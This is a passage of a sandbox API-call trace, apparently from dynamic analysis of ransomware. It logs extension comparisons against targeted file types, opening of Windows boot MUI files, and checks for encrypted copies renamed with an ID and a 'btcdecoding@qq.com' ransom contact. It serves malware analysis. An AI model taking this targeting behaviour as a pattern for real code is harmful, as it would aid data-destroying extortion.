(lpString=".bz2") returned 4 [0269.254] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".7z") returned 3 [0269.254] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString=".dbf") returned 4 [0269.254] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString=".1cd") returned 4 [0269.254] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString=".jpg") returned 4 [0269.254] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString=".doc") returned 4 [0269.254] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".docx") returned 5 [0269.254] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0269.254] lstrlenW (lpString=".pdf") returned 4 [0269.254] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".xls") returned 4 [0269.254] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".xlsx") returned 5 [0269.254] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0269.254] lstrlenW (lpString=".ppt") returned 4 [0269.254] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.254] lstrlenW (lpString=".zip") returned 4 [0269.254] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".rar") returned 4 [0269.254] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0269.254] lstrlenW (lpString=".bz2") returned 4 [0269.255] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0269.255] lstrlenW (lpString=".7z") returned 3 [0269.255] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0269.255] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.255] lstrlenW (lpString=".dbf") returned 4 [0269.255] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0269.255] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.255] lstrlenW (lpString=".1cd") returned 4 [0269.255] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0269.255] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.255] lstrlenW (lpString=".jpg") returned 4 [0269.255] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0269.255] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.255] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.255] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.256] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=87616) returned 1 [0269.256] CloseHandle (hObject=0x1f0) returned 1 [0269.256] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0269.256] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.256] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.256] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.256] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.256] lstrlenW (lpString=".doc") returned 4 [0269.256] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.256] lstrlenW (lpString=".docx") returned 5 [0269.256] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.256] lstrlenW (lpString=".pdf") returned 4 [0269.256] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.256] lstrlenW (lpString=".xls") returned 4 [0269.256] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.256] lstrlenW (lpString=".xlsx") returned 5 [0269.256] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.256] lstrlenW (lpString=".ppt") returned 4 [0269.256] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString=".zip") returned 4 [0269.257] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.257] lstrlenW (lpString=".rar") returned 4 [0269.257] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.257] lstrlenW (lpString=".bz2") returned 4 [0269.257] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.257] lstrlenW (lpString=".7z") returned 3 [0269.257] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString=".dbf") returned 4 [0269.257] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString=".1cd") returned 4 [0269.257] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString=".jpg") returned 4 [0269.257] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.257] lstrlenW (lpString=".doc") returned 4 [0269.257] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.257] lstrlenW (lpString=".docx") returned 5 [0269.257] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.257] lstrlenW (lpString=".pdf") returned 4 [0269.257] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.257] lstrlenW (lpString=".xls") returned 4 [0269.257] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.257] lstrlenW (lpString=".xlsx") returned 5 [0269.257] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.257] lstrlenW (lpString=".ppt") returned 4 [0269.257] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.258] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.258] lstrlenW (lpString=".zip") returned 4 [0269.258] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.258] lstrlenW (lpString=".rar") returned 4 [0269.258] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.258] lstrlenW (lpString=".bz2") returned 4 [0269.258] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.258] lstrlenW (lpString=".7z") returned 3 [0269.258] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.258] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.258] lstrlenW (lpString=".dbf") returned 4 [0269.258] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.258] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.258] lstrlenW (lpString=".1cd") returned 4 [0269.258] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.258] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0269.258] lstrlenW (lpString=".jpg") returned 4 [0269.258] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.258] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.258] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.258] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.258] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=91712) returned 1 [0269.258] CloseHandle (hObject=0x1f0) returned 1 [0269.258] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0269.259] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.259] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.259] lstrlenW (lpString=".doc") returned 4 [0269.259] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.259] lstrlenW (lpString=".docx") returned 5 [0269.259] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.259] lstrlenW (lpString=".pdf") returned 4 [0269.259] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.259] lstrlenW (lpString=".xls") returned 4 [0269.259] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.259] lstrlenW (lpString=".xlsx") returned 5 [0269.259] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.259] lstrlenW (lpString=".ppt") returned 4 [0269.259] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.259] lstrlenW (lpString=".zip") returned 4 [0269.259] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.259] lstrlenW (lpString=".rar") returned 4 [0269.259] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.259] lstrlenW (lpString=".bz2") returned 4 [0269.259] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.259] lstrlenW (lpString=".7z") returned 3 [0269.259] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.259] lstrlenW (lpString=".dbf") returned 4 [0269.259] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.259] lstrlenW (lpString=".1cd") returned 4 [0269.259] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.259] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString=".jpg") returned 4 [0269.260] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString=".doc") returned 4 [0269.260] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.260] lstrlenW (lpString=".docx") returned 5 [0269.260] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.260] lstrlenW (lpString=".pdf") returned 4 [0269.260] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.260] lstrlenW (lpString=".xls") returned 4 [0269.260] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.260] lstrlenW (lpString=".xlsx") returned 5 [0269.260] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.260] lstrlenW (lpString=".ppt") returned 4 [0269.260] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString=".zip") returned 4 [0269.260] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.260] lstrlenW (lpString=".rar") returned 4 [0269.260] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.260] lstrlenW (lpString=".bz2") returned 4 [0269.260] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.260] lstrlenW (lpString=".7z") returned 3 [0269.260] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString=".dbf") returned 4 [0269.260] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.260] lstrlenW (lpString=".1cd") returned 4 [0269.260] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.260] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0269.261] lstrlenW (lpString=".jpg") returned 4 [0269.261] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.261] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.261] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.261] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.261] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=94800) returned 1 [0269.261] CloseHandle (hObject=0x1f0) returned 1 [0269.261] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0269.261] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.261] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.261] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.261] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.261] lstrlenW (lpString=".doc") returned 4 [0269.261] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.261] lstrlenW (lpString=".docx") returned 5 [0269.261] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.261] lstrlenW (lpString=".pdf") returned 4 [0269.261] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.261] lstrlenW (lpString=".xls") returned 4 [0269.261] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.262] lstrlenW (lpString=".xlsx") returned 5 [0269.262] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.262] lstrlenW (lpString=".ppt") returned 4 [0269.262] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString=".zip") returned 4 [0269.262] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.262] lstrlenW (lpString=".rar") returned 4 [0269.262] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.262] lstrlenW (lpString=".bz2") returned 4 [0269.262] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.262] lstrlenW (lpString=".7z") returned 3 [0269.262] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString=".dbf") returned 4 [0269.262] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString=".1cd") returned 4 [0269.262] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString=".jpg") returned 4 [0269.262] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.262] lstrlenW (lpString=".doc") returned 4 [0269.262] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.262] lstrlenW (lpString=".docx") returned 5 [0269.262] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.262] lstrlenW (lpString=".pdf") returned 4 [0269.262] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.262] lstrlenW (lpString=".xls") returned 4 [0269.262] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.263] lstrlenW (lpString=".xlsx") returned 5 [0269.263] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.263] lstrlenW (lpString=".ppt") returned 4 [0269.263] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.263] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.263] lstrlenW (lpString=".zip") returned 4 [0269.263] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.263] lstrlenW (lpString=".rar") returned 4 [0269.263] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.263] lstrlenW (lpString=".bz2") returned 4 [0269.263] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.263] lstrlenW (lpString=".7z") returned 3 [0269.263] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.263] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.263] lstrlenW (lpString=".dbf") returned 4 [0269.263] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.263] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.263] lstrlenW (lpString=".1cd") returned 4 [0269.263] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.263] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0269.263] lstrlenW (lpString=".jpg") returned 4 [0269.263] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.263] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.263] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.263] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.265] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=85056) returned 1 [0269.265] CloseHandle (hObject=0x1f0) returned 1 [0269.265] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0269.265] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.265] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.265] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.265] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.265] lstrlenW (lpString=".doc") returned 4 [0269.265] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.265] lstrlenW (lpString=".docx") returned 5 [0269.265] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.265] lstrlenW (lpString=".pdf") returned 4 [0269.265] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.265] lstrlenW (lpString=".xls") returned 4 [0269.265] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.265] lstrlenW (lpString=".xlsx") returned 5 [0269.265] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.265] lstrlenW (lpString=".ppt") returned 4 [0269.265] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.265] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.265] lstrlenW (lpString=".zip") returned 4 [0269.266] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.266] lstrlenW (lpString=".rar") returned 4 [0269.266] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.266] lstrlenW (lpString=".bz2") returned 4 [0269.266] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.266] lstrlenW (lpString=".7z") returned 3 [0269.266] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString=".dbf") returned 4 [0269.266] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString=".1cd") returned 4 [0269.266] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString=".jpg") returned 4 [0269.266] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString=".doc") returned 4 [0269.266] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.266] lstrlenW (lpString=".docx") returned 5 [0269.266] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.266] lstrlenW (lpString=".pdf") returned 4 [0269.266] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.266] lstrlenW (lpString=".xls") returned 4 [0269.266] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.266] lstrlenW (lpString=".xlsx") returned 5 [0269.266] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.266] lstrlenW (lpString=".ppt") returned 4 [0269.266] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.266] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.266] lstrlenW (lpString=".zip") returned 4 [0269.266] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.267] lstrlenW (lpString=".rar") returned 4 [0269.267] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.267] lstrlenW (lpString=".bz2") returned 4 [0269.267] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.267] lstrlenW (lpString=".7z") returned 3 [0269.267] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.267] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.267] lstrlenW (lpString=".dbf") returned 4 [0269.267] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.267] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.267] lstrlenW (lpString=".1cd") returned 4 [0269.267] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.267] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0269.267] lstrlenW (lpString=".jpg") returned 4 [0269.267] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.267] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.267] lstrlenW (lpString="memtest.exe.mui") returned 15 [0269.267] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.267] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x310ff1c | out: lpFileSize=0x310ff1c*=43600) returned 1 [0269.267] CloseHandle (hObject=0x1f0) returned 1 [0269.267] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0269.267] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.267] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString=".doc") returned 4 [0269.268] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.268] lstrlenW (lpString=".docx") returned 5 [0269.268] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.268] lstrlenW (lpString=".pdf") returned 4 [0269.268] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.268] lstrlenW (lpString=".xls") returned 4 [0269.268] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.268] lstrlenW (lpString=".xlsx") returned 5 [0269.268] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.268] lstrlenW (lpString=".ppt") returned 4 [0269.268] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.268] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0269.268] lstrlenW (lpString=".zip") returned 4 [0269.268] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.268] lstrlenW (lpString=".rar") returned 4 [0269.268] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 